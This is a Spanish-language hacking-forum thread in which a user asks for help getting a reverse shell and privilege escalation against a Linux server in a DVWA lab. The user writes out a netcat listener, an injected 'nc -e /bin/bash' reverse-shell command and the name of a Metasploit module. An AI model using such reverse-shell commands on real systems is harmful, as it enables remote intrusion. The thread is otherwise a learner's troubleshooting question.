elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Proceso de subir una Shell Inversa para hacer una escalada de privilegios
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Proceso de subir una Shell Inversa para hacer una escalada de privilegios  (Leído 3,075 veces)
cybersthl

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Proceso de subir una Shell Inversa para hacer una escalada de privilegios
« en: 29 Agosto 2018, 20:48 pm »

Buenas tardes a todos,

Llevo semanas intentando subir una shellinversa a un servidor linux, para hacer una escalada de privilegios, pero no entiendo bien el proceso de como hacerlo, y en la mayoría de los tutoriales que veo, lo hacen con DVWA por medio de las vulnerabilidades webs que existen en el servidor, ya sea con php, nc, imagen... pero no consigo lograrlo,  :-( :-( :-( pero la shell siempre se ejecuta en el servidor local, y sí, he llegado a establecer una conexión, pero no me sirve de nada porque es en la máquina local donde tengo el kali... haciendo las pruebas.

Alguien, podría echarme un cable, please... y no al cuello jjaja que de eso, ya estoy apunto de hacerlo yo.. jajajaj

PD: Es todo meramente didáctico, nada de hacer el mal a nadie :)

Gracias y buen día!
En línea

aangrymasther

Desconectado Desconectado

Mensajes: 69


Zona especial Este


Ver Perfil
Re: Proceso de subir una Shell Inversa para hacer una escalada de privilegios
« Respuesta #1 en: 30 Agosto 2018, 20:25 pm »

¿Estas seguro que el servidor tiene alguna vulnerabilidad que te permita subir una shell?
En línea

Probablemente el 99% de lo que digo sea incorrecto
cybersthl

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Proceso de subir una Shell Inversa para hacer una escalada de privilegios
« Respuesta #2 en: 30 Agosto 2018, 21:18 pm »

Sí, el puerto 80 es vulnerable.
Instale en mi kali, DVWA para explotar esa vulnerabilidad e intentar subir una shell al servidor en cuestión, 228.128.

En el kali, abrí el puerto 8888
nc -lvp 8888

En la parte de ejecución de comandos en DVWA, puse lo sig:
192.168.228.128 nc e /bin/bash 192.168.228.128 8888

Con lo anterior, no se abre ninguna session.
Pero si pongo la ip de mi kali que es: la 135, si que funciona y saca la shell, pero la local, no me interesa esto, quiero saber como hacer para que se ejecute la shell en el servidor remoto 128.

Intenté usar un exploit y tampoco nada. (multi/script/web_delivery)
Solo me abra la shell en local de la kali, no del servidor 128.

Igual estoy haciendo algo mal, porque no termino de entender el proceso de ejecución de los comandos. Tendría que primero abrir el puerto para tenerlo a  la escucha, luego usar DVWA para injectar la shell y en teoría, nada más.

Agradecería si alguien me explciara el order correcto de ejecución en un caso real, usando el exploit o nc.

Gracias de antemano.
Saludos
Thelma.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
0-DAY windows escalada privilegios!
Bugs y Exploits
Debci 8 9,191 Último mensaje 18 Agosto 2010, 19:29 pm
por guicamper322
ayuda escalada de privilegios!!!
Bugs y Exploits
morty2 4 7,882 Último mensaje 12 Octubre 2011, 21:40 pm
por morty2
Escalada de privilegios
Hacking
XKC 1 2,861 Último mensaje 27 Febrero 2018, 23:15 pm
por engel lex
Subir privilegios
Windows
UnaiiM 2 2,448 Último mensaje 27 Mayo 2019, 14:32 pm
por UnaiiM
contribucion shell inversa en jrunscript
Java
sapito169 0 2,388 Último mensaje 3 Enero 2022, 07:10 am
por sapito169
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines